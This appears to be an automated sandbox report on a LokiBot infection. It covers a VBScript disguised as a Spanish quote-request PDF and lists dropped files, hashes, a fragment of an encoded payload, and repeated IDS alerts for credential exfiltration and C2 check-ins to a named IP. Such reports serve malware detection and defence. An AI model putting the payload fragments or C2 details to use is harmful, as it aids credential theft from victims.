                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:Nlllultnxj:NllU
                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                      Malicious:false
                      Preview:@...e................................................@..........

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa4clu1a.ayx.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tizitbg1.z2u.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnz1vi2.yk0.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xb54n4lx.fgg.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Roaming\188E93\31437F.exe

                      Download File
                      Process:C:\Windows\SysWOW64\dxdiag.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):222720
                      Entropy (8bit):5.934092890012391
                      Encrypted:false
                      SSDEEP:3072:MMlaJEzHyusOl081O6Zdtx7SNchIarfvdNpNXXR2P9K:k0HF/1l9lhIabdNpNMP
                      MD5:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                      SHA1:B65ED4B4B1FB9CC5C128EE48A0B7CD326BA3AC93
                      SHA-256:C36C36C2945802FEB2195AD271C98F994B22A09F6CF2A1764A190865D1D6CE2B
                      SHA-512:7C4CC31303C59903E74B29B6EC14138611567A09281A4728D2B2A9B170E14344395173C1D97DF34B2F0391BC7365AC856884643C857325C3EA293AEF643C53E7
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D@C..!-..!-..!-..Y...!-..J...!-..J)..!-..J,..!-..!,..%-..J$..!-..J(."!-..J..!-..J..!-..J/..!-.Rich.!-.........................PE..L...)c............................................@.......................................@...... ......................................Xt...................p..."..p...T...........................X................................................text...d........................... ..`.data...............................@....idata..*...........................@..@.rsrc...Xt.......v..................@..@.reloc..."...p...$...B..............@..B........................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\188E93\31437F.lck

                      Download File
                      Process:C:\Windows\SysWOW64\dxdiag.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

                      Download File
                      Process:C:\Windows\SysWOW64\dxdiag.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):50
                      Entropy (8bit):1.5212424590621707
                      Encrypted:false
                      SSDEEP:3:/lvlp:p
                      MD5:C851BF93667BDD6310D56581D955C2AE
                      SHA1:8FC5AEC1542BD7471BF815632863622EFE23A834
                      SHA-256:3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
                      SHA-512:D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
                      Malicious:false
                      Preview:........................................user.

                      C:\Users\user\AppData\Roaming\Tallowweed.Kli

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:dropped
                      Size (bytes):491396
                      Entropy (8bit):5.966611679960197
                      Encrypted:false
                      SSDEEP:6144:pJ7et8GT6mrC8gji2dLGdcTef6N26ZRfGo/jREAXAk8hlGsvnaJojktOZ20SeJrp:z7edCLegLGdpf6N26ZVvpuKqDP5h
                      MD5:C5139B3748A3D2E8508528467DB482E6
                      SHA1:E5F28F16EB9AFC3D80CF0998994B5D705D319CF7
                      SHA-256:3E716CB2D2058CCEB704989730F24517AA7EBE00B09FEC07C2452B3DFF6E152B
                      SHA-512:FCE4BD2E64097F5D1F65763732601B43DB2E82CB7BE362A5775F1AADC293CBC107361EF2D2E8C6E29E1197CA03055E210982817B1E49D8B401603414E7002FF7
                      Malicious:false
                      Preview:cQGbcQGbu19lFwBxAZvrAlOTA1wkBOsCdNFxAZu5ra92wesCdePrAnaOgfFp5FdccQGbcQGbgfHESyGdcQGbcQGbcQGb6wJ0sbo80qaacQGbcQGb6wI5CHEBmzHKcQGb6wIaYIkUC3EBm+sCfDrR4usCU/dxAZuDwQRxAZvrAnSGgflhTTYEfMvrAmlZ6wITz4tEJATrAnYo6wICHInD6wItJnEBm4HD7iwbAesClpLrAu2hulHNpkxxAZvrAhsYgcJQiJsG6wKSJHEBm4HCX6q9rHEBm+sCHQdxAZvrArmu6wK37nEBm4sMEHEBm3EBm4kME+sCwK1xAZtCcQGb6wI+p4H6kCQFAHXWcQGb6wJwy4lcJAxxAZvrArjlge0AAwAAcQGb6wLXGYtUJAhxAZtxAZuLfCQEcQGb6wLHjInr6wLh6usC0oOBw5wAAABxAZvrAiU9U+sCBLRxAZtqQHEBm3EBm4nrcQGbcQGbx4MAAQAAAMBQBOsCo8dxAZuBwwABAABxAZtxAZtTcQGbcQGbietxAZvrApH2ibsEAQAAcQGb6wJT2YHDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm+sC2xiDwgXrAiAa6wKLlDH26wJmuusCVDUxyesCzbpxAZuLGnEBm+sC0iFB6wJPbOsClBc5HAp18usCgzxxAZtGcQGbcQGbgHwK+7h13esCRo9xAZuLRAr8cQGbcQGbKfDrArqd6wIOZv/S6wJk3+sCsyq6kCQFAOsChyfrAs/eMcBxAZvrAro8i3wkDHEBm+sCpnyBNAe31bz7cQGbcQGbg8AE6wKReesCiko50HXkcQGbcQGbifvrAvx6cQGb/9dxAZtxAZs3L55yUlz5IA/TjFCT4OZM776JLmSilf7Ae8dinhE3vmxRdq6PDTUeDojWxTjtQXp2mu4ksFR92rfz93pGAAC4VbOFMI4Ue7+61d3g/dA9l7rVn9hpOzg4NpGx++HGESgyDz2PutUo

                      Static File Info

                      General

                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):4.9518955642187805
                      TrID:
                      • Visual Basic Script (13500/0) 100.00%
                      File name:Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs
                      File size:74'758 bytes
                      MD5:5cc7cf5b0814e2f80bad4c4e85831e96
                      SHA1:93ed4011fc57034804feb5bd8ea61c6cf7b30cce
                      SHA256:12cf262af8e265c0013ba1e06bfe89b0e9b65acffe82f2f54121dcd434c4b394
                      SHA512:f9834c708ff8af1734b345f156d7abcebc8675f6e481fe65ac4512578d71cac11a3eba9779f2708a990858da9dce32c2e8416c967b77701991d7692393fa8c09
                      SSDEEP:1536:s+0UNtNTLbVAumhqIkeF+3e+2Tyf4hHKMHAqLkf:s+5LfAFh62TS4hKf
                      TLSH:9373B2D2DBD4273B7BC2C75CBD4307B781B985980A16839EBD890ECD183F85897BA254
                      File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                      File Icon

                      Icon Hash:68d69b8f86ab9a86

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-01T07:44:38.340304+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749707142.250.185.142443TCP
                      2024-10-01T07:44:42.734823+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749709137.184.191.21580TCP
                      2024-10-01T07:44:42.734823+02002025381ET MALWARE LokiBot Checkin1192.168.2.749709137.184.191.21580TCP
                      2024-10-01T07:44:45.355745+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.749709137.184.191.21580TCP
                      2024-10-01T07:44:45.430241+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749710137.184.191.21580TCP
                      2024-10-01T07:44:45.430241+02002025381ET MALWARE LokiBot Checkin1192.168.2.749710137.184.191.21580TCP
                      2024-10-01T07:44:48.265499+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.749710137.184.191.21580TCP
                      2024-10-01T07:44:48.499597+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749711137.184.191.21580TCP
                      2024-10-01T07:44:48.499597+02002025381ET MALWARE LokiBot Checkin1192.168.2.749711137.184.191.21580TCP
                      2024-10-01T07:44:51.084955+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749711137.184.191.21580TCP
                      2024-10-01T07:44:51.084955+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749711137.184.191.21580TCP
                      2024-10-01T07:44:51.247041+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749715137.184.191.21580TCP
                      2024-10-01T07:44:51.247041+02002025381ET MALWARE LokiBot Checkin1192.168.2.749715137.184.191.21580TCP
                      2024-10-01T07:44:53.797155+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749715137.184.191.21580TCP
                      2024-10-01T07:44:53.797155+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749715137.184.191.21580TCP
                      2024-10-01T07:44:53.977271+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749716137.184.191.21580TCP
                      2024-10-01T07:44:53.977271+02002025381ET MALWARE LokiBot Checkin1192.168.2.749716137.184.191.21580TCP
                      2024-10-01T07:44:56.665130+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749716137.184.191.21580TCP
                      2024-10-01T07:44:56.665130+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749716137.184.191.21580TCP
                      2024-10-01T07:44:56.833376+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749717137.184.191.21580TCP
                      2024-10-01T07:44:56.833376+02002025381ET MALWARE LokiBot Checkin1192.168.2.749717137.184.191.21580TCP
                      2024-10-01T07:44:59.412791+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749717137.184.191.21580TCP
                      2024-10-01T07:44:59.412791+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749717137.184.191.21580TCP
                      2024-10-01T07:44:59.762869+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749718137.184.191.21580TCP
                      2024-10-01T07:44:59.762869+02002025381ET MALWARE LokiBot Checkin1192.168.2.749718137.184.191.21580TCP
                      2024-10-01T07:45:02.344775+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749718137.184.191.21580TCP
                      2024-10-01T07:45:02.344775+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749718137.184.191.21580TCP
                      2024-10-01T07:45:02.498334+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749719137.184.191.21580TCP
                      2024-10-01T07:45:02.498334+02002025381ET MALWARE LokiBot Checkin1192.168.2.749719137.184.191.21580TCP
                      2024-10-01T07:45:05.063364+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749719137.184.191.21580TCP
                      2024-10-01T07:45:05.063364+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749719137.184.191.21580TCP
                      2024-10-01T07:45:05.218401+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749720137.184.191.21580TCP
                      2024-10-01T07:45:05.218401+02002025381ET MALWARE LokiBot Checkin1192.168.2.749720137.184.191.21580TCP
                      2024-10-01T07:45:07.848185+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749720137.184.191.21580TCP
                      2024-10-01T07:45:07.848185+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749720137.184.191.21580TCP
                      2024-10-01T07:45:08.004705+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749721137.184.191.21580TCP
                      2024-10-01T07:45:08.004705+02002025381ET MALWARE LokiBot Checkin1192.168.2.749721137.184.191.21580TCP
                      2024-10-01T07:45:10.771424+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749721137.184.191.21580TCP
                      2024-10-01T07:45:10.771424+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749721137.184.191.21580TCP
                      2024-10-01T07:45:10.938340+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749722137.184.191.21580TCP
                      2024-10-01T07:45:10.938340+02002025381ET MALWARE LokiBot Checkin1192.168.2.749722137.184.191.21580TCP
                      2024-10-01T07:45:13.525771+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749722137.184.191.21580TCP
                      2024-10-01T07:45:13.525771+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749722137.184.191.21580TCP
                      2024-10-01T07:45:13.695208+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749723137.184.191.21580TCP
                      2024-10-01T07:45:13.695208+02002025381ET MALWARE LokiBot Checkin1192.168.2.749723137.184.191.21580TCP
                      2024-10-01T07:45:16.261887+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749723137.184.191.21580TCP
                      2024-10-01T07:45:16.261887+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749723137.184.191.21580TCP
                      2024-10-01T07:45:16.444408+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749724137.184.191.21580TCP
                      2024-10-01T07:45:16.444408+02002025381ET MALWARE LokiBot Checkin1192.168.2.749724137.184.191.21580TCP
                      2024-10-01T07:45:19.036407+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749724137.184.191.21580TCP
                      2024-10-01T07:45:19.036407+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749724137.184.191.21580TCP
                      2024-10-01T07:45:19.193169+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749725137.184.191.21580TCP
                      2024-10-01T07:45:19.193169+02002025381ET MALWARE LokiBot Checkin1192.168.2.749725137.184.191.21580TCP
                      2024-10-01T07:45:21.752968+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749725137.184.191.21580TCP
                      2024-10-01T07:45:21.752968+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749725137.184.191.21580TCP
                      2024-10-01T07:45:21.906100+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749726137.184.191.21580TCP
                      2024-10-01T07:45:21.906100+02002025381ET MALWARE LokiBot Checkin1192.168.2.749726137.184.191.21580TCP
                      2024-10-01T07:45:24.487671+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749726137.184.191.21580TCP
                      2024-10-01T07:45:24.487671+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749726137.184.191.21580TCP
                      2024-10-01T07:45:24.642575+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749727137.184.191.21580TCP
                      2024-10-01T07:45:24.642575+02002025381ET MALWARE LokiBot Checkin1192.168.2.749727137.184.191.21580TCP
                      2024-10-01T07:45:27.381066+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749727137.184.191.21580TCP
                      2024-10-01T07:45:27.381066+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749727137.184.191.21580TCP
                      2024-10-01T07:45:27.919113+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749728137.184.191.21580TCP
                      2024-10-01T07:45:27.919113+02002025381ET MALWARE LokiBot Checkin1192.168.2.749728137.184.191.21580TCP
                      2024-10-01T07:45:30.517560+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749728137.184.191.21580TCP
                      2024-10-01T07:45:30.517560+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749728137.184.191.21580TCP
                      2024-10-01T07:45:30.964238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749729137.184.191.21580TCP
                      2024-10-01T07:45:30.964238+02002025381ET MALWARE LokiBot Checkin1192.168.2.749729137.184.191.21580TCP
                      2024-10-01T07:45:33.616722+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749729137.184.191.21580TCP
                      2024-10-01T07:45:33.616722+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749729137.184.191.21580TCP
                      2024-10-01T07:45:33.769111+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749730137.184.191.21580TCP
                      2024-10-01T07:45:33.769111+02002025381ET MALWARE LokiBot Checkin1192.168.2.749730137.184.191.21580TCP
                      2024-10-01T07:45:36.504965+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749730137.184.191.21580TCP
                      2024-10-01T07:45:36.504965+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749730137.184.191.21580TCP
                      2024-10-01T07:45:36.660144+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749731137.184.191.21580TCP
                      2024-10-01T07:45:36.660144+02002025381ET MALWARE LokiBot Checkin1192.168.2.749731137.184.191.21580TCP
                      2024-10-01T07:45:39.222873+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749731137.184.191.21580TCP
                      2024-10-01T07:45:39.222873+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749731137.184.191.21580TCP
                      2024-10-01T07:45:39.377390+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749732137.184.191.21580TCP
                      2024-10-01T07:45:39.377390+02002025381ET MALWARE LokiBot Checkin1192.168.2.749732137.184.191.21580TCP
                      2024-10-01T07:45:42.347762+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749732137.184.191.21580TCP
                      2024-10-01T07:45:42.347762+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749732137.184.191.21580TCP
                      2024-10-01T07:45:42.498444+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749733137.184.191.21580TCP
                      2024-10-01T07:45:42.498444+02002025381ET MALWARE LokiBot Checkin1192.168.2.749733137.184.191.21580TCP
                      2024-10-01T07:45:45.146305+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749733137.184.191.21580TCP
                      2024-10-01T07:45:45.146305+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749733137.184.191.21580TCP
                      2024-10-01T07:45:45.298134+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749734137.184.191.21580TCP
                      2024-10-01T07:45:45.298134+02002025381ET MALWARE LokiBot Checkin1192.168.2.749734137.184.191.21580TCP
                      2024-10-01T07:45:48.020419+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749734137.184.191.21580TCP
                      2024-10-01T07:45:48.020419+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749734137.184.191.21580TCP
                      2024-10-01T07:45:48.385314+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749735137.184.191.21580TCP
                      2024-10-01T07:45:48.385314+02002025381ET MALWARE LokiBot Checkin1192.168.2.749735137.184.191.21580TCP
                      2024-10-01T07:45:50.982541+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749735137.184.191.21580TCP
                      2024-10-01T07:45:50.982541+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749735137.184.191.21580TCP
                      2024-10-01T07:45:51.251136+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749736137.184.191.21580TCP
                      2024-10-01T07:45:51.251136+02002025381ET MALWARE LokiBot Checkin1192.168.2.749736137.184.191.21580TCP
                      2024-10-01T07:45:53.802372+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749736137.184.191.21580TCP
                      2024-10-01T07:45:53.802372+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749736137.184.191.21580TCP
                      2024-10-01T07:45:54.100526+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749737137.184.191.21580TCP
                      2024-10-01T07:45:54.100526+02002025381ET MALWARE LokiBot Checkin1192.168.2.749737137.184.191.21580TCP
                      2024-10-01T07:45:56.726060+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749737137.184.191.21580TCP
                      2024-10-01T07:45:56.726060+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749737137.184.191.21580TCP
                      2024-10-01T07:45:56.873550+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749738137.184.191.21580TCP
                      2024-10-01T07:45:56.873550+02002025381ET MALWARE LokiBot Checkin1192.168.2.749738137.184.191.21580TCP
                      2024-10-01T07:45:59.432377+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749738137.184.191.21580TCP
                      2024-10-01T07:45:59.432377+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749738137.184.191.21580TCP
                      2024-10-01T07:45:59.605783+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749739137.184.191.21580TCP
                      2024-10-01T07:45:59.605783+02002025381ET MALWARE LokiBot Checkin1192.168.2.749739137.184.191.21580TCP
                      2024-10-01T07:46:02.166163+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749739137.184.191.21580TCP
                      2024-10-01T07:46:02.166163+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749739137.184.191.21580TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 1, 2024 07:43:50.583379030 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:50.583452940 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:50.583543062 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:50.590521097 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:50.590540886 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.235975981 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.236053944 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.237159967 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.237227917 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.241576910 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.241600990 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.241887093 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.254376888 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.299408913 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.623806953 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.623889923 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.624984026 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.625034094 CEST44349700142.250.185.142192.168.2.7
                      Oct 1, 2024 07:43:51.625082970 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.628256083 CEST49700443192.168.2.7142.250.185.142
                      Oct 1, 2024 07:43:51.642939091 CEST49701443192.168.2.7142.250.181.225
                      Oct 1, 2024 07:43:51.642997026 CEST44349701142.250.181.225192.168.2.7
                      Oct 1, 2024 07:43:51.643081903 CEST49701443192.168.2.7142.250.181.225
                      Oct 1, 2024 07:43:51.643987894 CEST49701443192.168.2.7142.250.181.225
                      Oct 1, 2024 07:43:51.644000053 CEST44349701142.250.181.225192.168.2.7
                      Oct 1, 2024 07:43:52.307084084 CEST44349701142.250.181.225192.168.2.7
                      Oct 1, 2024 07:43:52.307214975 CEST49701443192.168.2.7142.250.181.225
                      Oct 1, 2024 07:43:52.310579062 CEST49701443192.168.2.7142.250.181.225
                      Oct 1, 2024 07:43:52.310590029 CEST44349701142.250.181.225192.168.2.7
